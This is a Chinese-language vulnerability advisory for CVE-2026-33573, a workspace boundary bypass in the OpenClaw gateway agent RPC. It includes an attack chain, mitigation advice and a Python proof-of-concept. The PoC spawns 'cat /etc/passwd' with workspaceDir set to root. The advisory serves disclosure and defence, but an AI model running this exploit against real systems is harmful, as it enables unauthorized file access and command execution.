CVE-2026-33573 CVSS 8.8 高危

CVE-2026-33573 OpenClaw授权绕过漏洞

披露日期: 2026-03-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33573

漏洞类型

授权绕过

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.11之前的版本中存在严重的授权绕过漏洞。该漏洞位于网关代理RPC组件中，允许拥有operator.write权限的已认证攻击者通过操控spawnedBy和workspaceDir参数，覆盖预设的工作区边界。成功利用此漏洞，攻击者可逃逸受限环境，在系统任意可访问目录下执行文件操作或命令，威胁极高。

技术细节

该漏洞源于OpenClaw网关代理RPC接口在处理进程生成请求时，对关键上下文参数缺乏严格的校验机制。系统设计初衷是通过工作区边界限制操作者的文件访问范围，但在处理特定RPC调用时，未对`spawnedBy`和`workspaceDir`参数进行有效验证。攻击者利用已获得的operator.write权限，构造包含恶意路径的RPC请求，将`workspaceDir`参数指定为系统根目录或任意敏感路径。由于系统信任了用户提供的这些参数，导致工作区隔离机制失效。攻击者进而可利用文件操作或执行接口，在逃逸后的目录中进行任意文件读写、命令执行等高危操作，最终可能导致服务器被完全接管。

攻击链分析

STEP 1

1. 初始访问与认证

攻击者获取OpenClaw平台的访问权限，并成功获得具有operator.write权限的账户凭据。

STEP 2

2. 识别漏洞点

攻击者分析网关代理RPC接口，发现spawnedBy和workspaceDir参数未进行严格校验。

STEP 3

3. 构造恶意载荷

攻击者构造特殊的RPC请求，将workspaceDir参数修改为系统根目录（/）或其他敏感路径，试图绕过工作区限制。

STEP 4

4. 执行攻击与逃逸

发送恶意请求，由于验证缺失，系统接受参数并执行。攻击者成功在受限区域之外执行任意文件读写或命令操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-33573: OpenClaw Workspace Boundary Bypass
# This script demonstrates how an authenticated operator can escape the workspace.

import requests
import json

TARGET_URL = "http://vulnerable-openclaw-instance:8080/api/gateway/rpc"
AUTH_TOKEN = "VALID_OPERATOR_TOKEN" # Requires authentication with operator.write

# Malicious RPC payload to bypass workspace restriction
payload = {
    "jsonrpc": "2.0",
    "method": "agent.spawn",
    "params": {
        "command": "cat /etc/passwd", # Arbitrary command execution
        # Vulnerability: Attacker-controlled parameters to override boundaries
        "spawnedBy": "attacker_controlled_process",
        "workspaceDir": "/"  # Escaping to root directory
    },
    "id": 1
}

headers = {
    "Content-Type": "application/json",
    "Authorization": f"Bearer {AUTH_TOKEN}"
}

try:
    response = requests.post(TARGET_URL, data=json.dumps(payload), headers=headers)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
    
    if response.status_code == 200:
        print("[+] Exploit successful! Workspace boundary bypassed.")
    else:
        print("[-] Exploit failed.")
        
except Exception as e:
    print(f"Error: {e}")

影响范围

OpenClaw < 2026.3.11

防御指南

临时缓解措施

如果无法立即升级，建议严格限制具有operator.write权限的用户数量，并监控网关代理RPC请求中的异常参数（如workspaceDir指向根目录的行为）。同时，可通过网络策略限制对RPC端口的访问，仅允许可信IP连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表